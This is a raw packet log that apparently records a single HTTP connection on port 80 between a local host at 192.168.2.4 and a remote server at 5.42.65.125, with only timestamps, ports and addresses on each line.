Dec 27, 2023 17:57:25.699850082 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.699852943 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.699877024 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.700706005 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.700726986 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.700743914 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.700758934 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.700773001 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.700776100 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.700790882 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.700802088 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.700820923 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.701596975 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.701612949 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.701659918 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.701685905 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.701711893 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.701721907 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.701730013 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.701745987 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.701772928 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.702483892 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.702501059 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.702513933 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.702533007 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.702558994 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.702574015 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.702591896 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.702605963 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.702641964 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.703464031 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.703500986 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.703514099 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.703530073 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.703553915 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.703593969 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.703598976 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.703644991 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.703691006 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.704370022 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.704416990 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.704478979 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.704495907 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.704509020 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.704524040 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.704539061 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.704555035 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.704588890 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.705373049 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.705432892 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.705442905 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.705460072 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.705472946 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.705486059 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.705499887 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.705517054 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.705545902 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.706180096 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.706213951 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.706226110 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.706473112 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.706490040 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.706502914 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.706537962 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.706566095 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.706569910 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.706583023 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.706595898 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.706626892 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.707407951 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.707427025 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.707441092 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.707454920 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.707468987 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.707483053 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.707504988 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.707515955 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.708332062 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.708349943 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.708389997 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.708395004 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.708414078 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.708425999 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.708432913 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.708448887 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.708499908 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.709290981 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.709316015 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.709332943 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.709347963 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.709350109 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.709366083 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.709379911 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.709379911 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.709409952 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.710751057 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.710777044 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.710794926 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.710804939 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.710809946 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.710828066 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.710839033 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.710841894 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.710872889 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.711667061 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.711716890 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.711740971 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.711744070 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.711790085 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.711791039 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.711811066 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.711827040 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.711883068 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.712500095 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.712522030 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.712536097 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.712549925 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.712553978 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.712582111 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.712591887 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.712608099 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.712635040 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.713099957 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.713119984 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.713156939 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.713169098 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.713185072 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.713198900 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.713215113 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.713222027 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.713251114 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.714224100 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.714267969 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.714359045 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.715058088 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.715076923 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.715091944 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.715104103 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.715117931 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.715126991 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.715131998 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.715147018 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.715164900 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.715502024 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.715518951 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.715532064 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.715545893 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.715554953 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.715576887 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.715583086 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.715635061 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.715667009 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.716353893 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.716377020 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.716392994 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.716415882 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.716443062 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.716456890 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.716475964 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.716490030 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.716526985 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.717278957 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.717307091 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.717329979 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.717367887 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.717416048 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.717432022 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.717447042 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.717459917 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.717488050 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.718204021 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.718226910 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.718241930 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.718255997 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.718266010 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.718271017 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.718286037 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.718298912 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.718328953 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.719115019 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.719136953 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.719183922 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.719193935 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.719211102 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.719224930 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.719235897 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.719244003 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.719273090 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.719985962 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.720036983 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.720076084 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.720092058 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.720104933 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.720118999 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.720133066 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.720141888 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.720185995 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.721023083 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.721043110 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.721059084 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.721074104 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.721076012 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.721090078 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.721105099 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.721108913 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.721138000 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.721870899 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.721890926 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.721935987 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.722109079 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.722151995 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.722162962 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.722178936 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.722235918 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.722254992 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.722269058 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.722286940 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.722318888 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.723134041 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.723157883 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.723171949 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.723186970 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.723200083 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.723206043 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.723217010 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.723227024 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.723244905 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.723954916 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.724081993 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.724100113 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.724113941 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.724128962 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.724139929 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.724144936 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.724175930 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.724867105 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.724886894 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.724926949 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.724930048 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.724941969 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.724956989 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.724976063 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.724991083 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.725022078 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.725756884 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.725780010 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.725804090 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.725806952 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.725821018 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.725836992 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.725843906 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.725856066 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.725888968 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.726613998 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.726659060 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.726670027 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.726676941 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.726692915 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.726707935 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.726722956 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.726736069 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.726775885 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.727530003 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.727550030 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.727562904 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.727596998 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.727615118 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.727617979 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.727653027 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.727667093 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.727701902 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.728568077 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.728588104 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.728611946 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.728645086 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.728662014 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.728673935 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.728691101 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.728702068 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.728724957 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.729347944 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.729366064 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.729417086 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.729835987 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.729851961 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.729865074 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.729881048 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.729891062 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.729897022 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.729912043 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.729922056 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.729973078 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.730597019 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.730612993 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.730663061 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.730674982 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.730680943 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.730695009 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.730709076 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.730712891 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.730741978 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.731372118 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.731409073 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.731424093 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.731456995 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.731462955 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.731472969 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.731481075 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.731487036 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.731520891 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.732389927 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.732408047 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.732420921 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.732441902 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.732479095 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.732494116 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.732494116 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.732507944 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.732542992 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.733239889 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.733258009 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.733273983 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.733290911 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.733316898 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.733325005 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.733345032 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.733359098 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.733393908 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.734143019 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.734160900 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.734174967 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.734189987 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.734190941 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.734225988 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.734256983 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.734272003 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.734312057 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.735073090 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.735094070 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.735106945 CET	80	49738	5.42.65.125	192.168.2.4
